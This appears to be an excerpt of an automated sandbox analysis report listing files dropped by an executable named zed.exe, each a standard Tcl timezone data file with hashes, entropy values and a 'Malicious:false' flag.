                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Port_of_Spain) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.866417687745155
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/290msh490th4:MByMYdIp7t290v490I
                                                                                                                                                                                                                                            MD5:6B570E79FA2AA7D6CB1E56A11EE0A37C
                                                                                                                                                                                                                                            SHA1:396A2C9BBE4F264DD5A4F2E44D3E63C57F52186B
                                                                                                                                                                                                                                            SHA-256:52921EEA2A1925DF06CEA4638ED4128FAAA8FBA40ED4E0741650B419E5152DCB
                                                                                                                                                                                                                                            SHA-512:FA75A179664BED02A0F5BC1B7C3DD5F3E986544A151634BA4C4401476F5999714C89E240D9AF805484D1BEC04A1A562157FAEECA1603C4FF8CFFB424B9DEB560
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1051
                                                                                                                                                                                                                                            Entropy (8bit):3.851275104153641
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Xe4QJnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/8:5kSeSFESoSQSrSsCSeSPS1cSQSQlSsSX
                                                                                                                                                                                                                                            MD5:03046BA6F8344C32AD7A22748DC871AB
                                                                                                                                                                                                                                            SHA1:AB9ED078D80AE99EF6DE4BF34AC45359B82D1284
                                                                                                                                                                                                                                            SHA-256:E6E6F6753E7D443052A64D4DB07B8D443CE13A573946E7D0A19CDD4BBA4A2F04
                                                                                                                                                                                                                                            SHA-512:620953BB4C8CF203262EC0C1F807543D24B9894C3B531AE57F7CEF630452CC9AC7CA41D43A6D8891F9CF17594E9EE34CF501F8508E7C0669A8E5EF9C70B6EAA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Porto_Velho) {.. {-9223372036854775808 -15336 0 LMT}.. {-1767210264 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {5712012
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):283
                                                                                                                                                                                                                                            Entropy (8bit):4.781646667761219
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290piDm2OH9VoHvMlFoeVVF70ZVVFUFkzk/lLJpR/lAov:MB862908mdHvCvMlGe/J0Z/uFkzk/lL1
                                                                                                                                                                                                                                            MD5:E2E2E0D6677FFF2E37BBFC3522F2A9AA
                                                                                                                                                                                                                                            SHA1:4C1C93E14FBC00B8B1E78B8D9631599164305EB1
                                                                                                                                                                                                                                            SHA-256:2981248A9F14EBFC8791EC5453170376CBD549557E495EA0E331CC18556C958E
                                                                                                                                                                                                                                            SHA-512:F056B03EB9945823F5284C840E06E298DD2DE854F1555CD16D0BB19D962B73EF34A05683E6369B0D89CB7C3F7D082C312CCA6F8C6A0BB53F5C75FE4A863FCD95
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Puerto_Rico) {.. {-9223372036854775808 -15865 0 LMT}.. {-2233035335 -14400 0 AST}.. {-873057600 -10800 0 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3729
                                                                                                                                                                                                                                            Entropy (8bit):3.6253057710886956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:2RPW7xUQjzoMUBI0nuUoDKlHslPlgiot7JC/Xk8NWse4r4g5xCEmSdLkUsZOn+ZW:247xUQjzoMUBI0nuUoDK6lPlgiot7JCV
                                                                                                                                                                                                                                            MD5:D4ECD2A380E55A10FB97AB1D29C619F3
                                                                                                                                                                                                                                            SHA1:AAAFF44590F08623BE6F61EA6EFF6488C99A73BF
                                                                                                                                                                                                                                            SHA-256:4E626BD8B9182E56ADA1E9276585E945957431EA9BEA949CE071305E4E3C70A2
                                                                                                                                                                                                                                            SHA-512:677EE7093A53B48DE526C5877DB7128E8746831FE0DC44A38EB84050757E6017C9471EEF9AFCCEEEB5794D1608E486840804C01BD6276EA53F3C7823B05ED62B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Punta_Arenas) {.. {-9223372036854775808 -17020 0 LMT}.. {-2524504580 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-736632000 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}.. {37767600 -14400 0 -04}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                                                                            Entropy (8bit):4.926514352074701
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7pYHAIgppuRN/290ly90pl:MByMY/pcRt290w90X
                                                                                                                                                                                                                                            MD5:552FBD2FBAD42F79C7993124D9CCC54B
                                                                                                                                                                                                                                            SHA1:9029B7CCE8A5AD0F14C05FFBCDA4CA225DEC1708
                                                                                                                                                                                                                                            SHA-256:FEC74A3FCBD9B99FDFF24B54223DA187958697CBE756A54592F6171C69F1403F
                                                                                                                                                                                                                                            SHA-512:96315C32C1D0DEF804A560022DA12B3C63200A680F2A37D1B03E1C9EA413842EB6051E1C2315AE4E7C374280AD0E59832F834A8D6D66E259EF62735A77917ECE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:America/Rainy_River) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7614
                                                                                                                                                                                                                                            Entropy (8bit):3.8349162993762267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Wi8h4ZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:bqOfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:793DAEDB7E3077DE52DCC3C8A7CBEC5B
                                                                                                                                                                                                                                            SHA1:37562E9F28D51DED41FFD5FF2FF19E2E4E453B7A
                                                                                                                                                                                                                                            SHA-256:AA8866D58BEAB07548180628FF423887BBF48AADB1B55392B288F7310F94A9B1
                                                                                                                                                                                                                                            SHA-512:68A32B41DC2D3E730D6BE53656B0D566AB1BCC1E189A2FFDB5687A947EF4F4008BC17456F8CE0D59C838EEA87A44400231A44E6AB35BEDBF5D7779E1CD7EFD8A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rankin_Inlet) {.. {-9223372036854775808 0 0 -00}.. {-410227200 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1420
                                                                                                                                                                                                                                            Entropy (8bit):3.78262494063765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5aLexyGcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaI1kR8nd:5eTChlvEw6kSSx5H4a8tf3fkuoYVZDm+
                                                                                                                                                                                                                                            MD5:4D12651CEE804EB9F29567CB37F12031
                                                                                                                                                                                                                                            SHA1:54B2613475B8BDB1DBCCA53A4895DA021F66BDC0
                                                                                                                                                                                                                                            SHA-256:A36AD4614FC9A2A433712B555156EDE03980B88EB91D8DC7E8B10451D6D7F7D3
                                                                                                                                                                                                                                            SHA-512:E6690F6B6DF613C8B7289A2DB71FBC9B87B997707A6C3B4B45BDE8F347082AE8C69F212BAACE50F3C04E325ABE0976AF1F61107BDF8A15D5B88F11FAE11A9D00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Recife) {.. {-9223372036854775808 -8376 0 LMT}.. {-1767217224 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1781
                                                                                                                                                                                                                                            Entropy (8bit):4.034282439637634
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290hjmdHfCv24Q1NAvHaE+YB+Q4kRcMxIeRUVX/SEQd1rRR9xRv0+Ro/wPjp:5EjeavTGOtAVvSRBpx0yq1epwD+yz+
                                                                                                                                                                                                                                            MD5:14B29B4391B643E5707096ADCC33C57E
                                                                                                                                                                                                                                            SHA1:B3F875ABB79C634C74307B7CB7B276B13AEE11D1
                                                                                                                                                                                                                                            SHA-256:50105E788288CF4C680B29BBDCDE94D8713A5361B38C6C469FD97CF05503FF7D
                                                                                                                                                                                                                                            SHA-512:D92A51547DF2C1AB6E6CDEFF34C07B755D3F6BB5E7DD1907693E7658EDE4D2BADC5DEFDB658ADD0F8D8F14B3B87CEA17BC00DAC364C5CB7ACBF8778C245276A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Regina) {.. {-9223372036854775808 -25116 0 LMT}.. {-2030202084 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1251651600 -21600 1 MDT}.. {-1238349600 -25200 0 MST}.. {-1220202000 -21600 1 MDT}.. {-1206900000 -25200 0 MST}.. {-1188752400 -21600 1 MDT}.. {-1175450400 -25200 0 MST}.. {-1156698000 -21600 1 MDT}.. {-1144000800 -25200 0 MST}.. {-1125248400 -21600 1 MDT}.. {-1111946400 -25200 0 MST}.. {-1032714000 -21600 1 MDT}.. {-1016992800 -25200 0 MST}.. {-1001264400 -21600 1 MDT}.. {-986148000 -25200 0 MST}.. {-969814800 -21600 1 MDT}.. {-954093600 -25200 0 MST}.. {-937760400 -21600 1 MDT}.. {-922039200 -25200 0 MST}.. {-906310800 -21600 1 MDT}.. {-890589600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-748450800 -21600 1 MDT}.. {-732729600 -25200 0 MST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7610
                                                                                                                                                                                                                                            Entropy (8bit):3.8312000314798085
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:li8h4Z80NA604qSScBgN+4ctDzIVQ/c/3hNxTh:EqOzA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:541EACD872723603971058CB205121D7
                                                                                                                                                                                                                                            SHA1:8F7DFD5ECA2913846D9342839AE1C60882153DA0
                                                                                                                                                                                                                                            SHA-256:643CC43E3F906779C040E1F0C20E78D6E95CC7301B3C7370A8ADBCBD76A8C5E8
                                                                                                                                                                                                                                            SHA-512:971D06D3FB67B7AE79EEDB6D3EBB805B5992C2BF4A7166016B405E21BFB25D9A87A757E8065073D5FBEB9084F6F742269A5BF432BF2F03D30913DB092E1AB3A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Resolute) {.. {-9223372036854775808 0 0 -00}.. {-704937600 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {73391
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.8413073465060457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Ybe/k5Yss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6Gs:505YsMw57XJh4CxUF/A6GTrtSUDwr
                                                                                                                                                                                                                                            MD5:7E23FDE0E158E8ED2E7536EDE70D2588
                                                                                                                                                                                                                                            SHA1:319052BE076DC79F130E807D68B11CCAA0636340
                                                                                                                                                                                                                                            SHA-256:28082D20872B61D6098D31D1C40F12464A946A933CD9AF74475C5AF384210890
                                                                                                                                                                                                                                            SHA-512:BE078ED12F05AB5CEE5D77212EB76A01A1BC52EEAA17E3B91D93B88D75E5281B6AF164E712A9AB0F57A21B3CDB20F6FCCADB73CAC4745B5D2E665D18F9F06B55
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rio_Branco) {.. {-9223372036854775808 -16272 0 LMT}.. {-1767209328 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {57120480
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.801485647578614
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/290rI5290/M7:MByMY/M7p/M16t290r190/M7
                                                                                                                                                                                                                                            MD5:90830F3B1F91FE48AC2944C7C92A3F6E
                                                                                                                                                                                                                                            SHA1:777377AE4959DDD2B472EB6041A23A5B93D64BB6
                                                                                                                                                                                                                                            SHA-256:0117D33D4F326AA536162D36A02439FBD5F2EB3B4F540B5BA91ED7747DDAC180
                                                                                                                                                                                                                                            SHA-512:20A371E4550E402AFEB83EF19EFFF6B3C0D7A68DCAA06AD894D04DB63B7096560E701C45B455B23A98BB20FE3B590F920219152415CA506AEDA427BB1381B826
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.869058214823402
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7ekHAIgpeON/290tX2U490eBn:MByMYMpJt290c90m
                                                                                                                                                                                                                                            MD5:F4E62378AA05771D348AA6DA516CD386
                                                                                                                                                                                                                                            SHA1:07FCA813693F7944CBCBB128F2F2FE32929D37A2
                                                                                                                                                                                                                                            SHA-256:3B4C2F3A5B9CD22A73F05187C032723D07BB53C9946D04D35E1BA1CB90CA0A62
                                                                                                                                                                                                                                            SHA-512:E9F6CEB824D656CA25A72BF8EB4347A22E1A8E40410F01E0C2EDE19ACAF32D76540399796B3EBC7781C8B5D48C1A6B2C856CA06158AE37D95C95CF0567DFA2E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Santa_Isabel) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1079
                                                                                                                                                                                                                                            Entropy (8bit):3.8200568741699223
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5zeUdunSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/h:52SeSFESoSQSrSsCSeSPS1cSQSQlSsSU
                                                                                                                                                                                                                                            MD5:7F2658032008F2C1308F121C2EBF2479
                                                                                                                                                                                                                                            SHA1:B6F24E818B4424C0DEF818C103D1DA5359958932
                                                                                                                                                                                                                                            SHA-256:4A397BD937DE1D7E6A941D18001B34D4CD195AEFD08951C30C7EE8E48656AA0E
                                                                                                                                                                                                                                            SHA-512:F78853AA75F58A85555DD79E08A7487E5161854650DBF480189790D855738FEDCBDA936870067DE40FE000861008A9E9AAF61DF02B6B30B96038C61B5E1F1C1D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santarem) {.. {-9223372036854775808 -13128 0 LMT}.. {-1767212472 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8871
                                                                                                                                                                                                                                            Entropy (8bit):3.5351636359890537
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2Xv/lxUQjzoMUBI0nuUoDK6lPlgiot7JC/k8NWse4r4g5xCEmMQUs8nCxvisEbzu:2fD9TzDC9g32+E
                                                                                                                                                                                                                                            MD5:81FC6AFF68B1CF2EA57ED13A42B35BE1
                                                                                                                                                                                                                                            SHA1:5889E502FBDCBCDFE9E7053625FFFBAD61FFE256
                                                                                                                                                                                                                                            SHA-256:77CED11337F43241D57C10BA752C7104A7AF8727992E7B90A3C5D62AA15E81C7
                                                                                                                                                                                                                                            SHA-512:7756CBAF76966F3D45883B725B791A8DD60E8329F6FE19C12029C6FEBC90D7322765A0A8BA26FC586443A902B372D0C0189426A8F99B2B535BB8F1EE74796B44
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santiago) {.. {-9223372036854775808 -16965 0 LMT}.. {-2524504635 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-740520000 -10800 1 -03}.. {-736635600 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):616
                                                                                                                                                                                                                                            Entropy (8bit):4.330655351784895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290/StmdHhvCvuCY/h/uFkS/5MVvMrW//MVvMrpx/m0XVvMr4UB/47VvMr/d:5+seQvuCY5/u/REfk+xxdbUBQpu652GO
                                                                                                                                                                                                                                            MD5:FAD0621010889164ADC4472003C9391F
                                                                                                                                                                                                                                            SHA1:C4EE0B8D6925338D17D5745DE9D45FA3C628DFC5
                                                                                                                                                                                                                                            SHA-256:2217E72B11A90F2D679C175DE3CC0F2FED4C280C9FF9707CFFAF118BF9A06A4B
                                                                                                                                                                                                                                            SHA-512:90E8E5A109CD72458C7796CF0324F63E543CCD63D13A09A3DD28EDC8B2793C964C18E79FDF0C5067C5A481B7FB03E8413139C32F59DA07E9D7893378ABBBD2B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santo_Domingo) {.. {-9223372036854775808 -16776 0 LMT}.. {-2524504824 -16800 0 SDMT}.. {-1159773600 -18000 0 EST}.. {-100119600 -14400 1 EDT}.. {-89668800 -18000 0 EST}.. {-5770800 -16200 1 -0430}.. {4422600 -18000 0 EST}.. {25678800 -16200 1 -0430}.. {33193800 -18000 0 EST}.. {57733200 -16200 1 -0430}.. {64816200 -18000 0 EST}.. {89182800 -16200 1 -0430}.. {96438600 -18000 0 EST}.. {120632400 -16200 1 -0430}.. {127974600 -18000 0 EST}.. {152082000 -14400 0 AST}.. {975823200 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2900
                                                                                                                                                                                                                                            Entropy (8bit):3.6548008349990755
                                                                                                                                                                                                                                            Encrypted:false
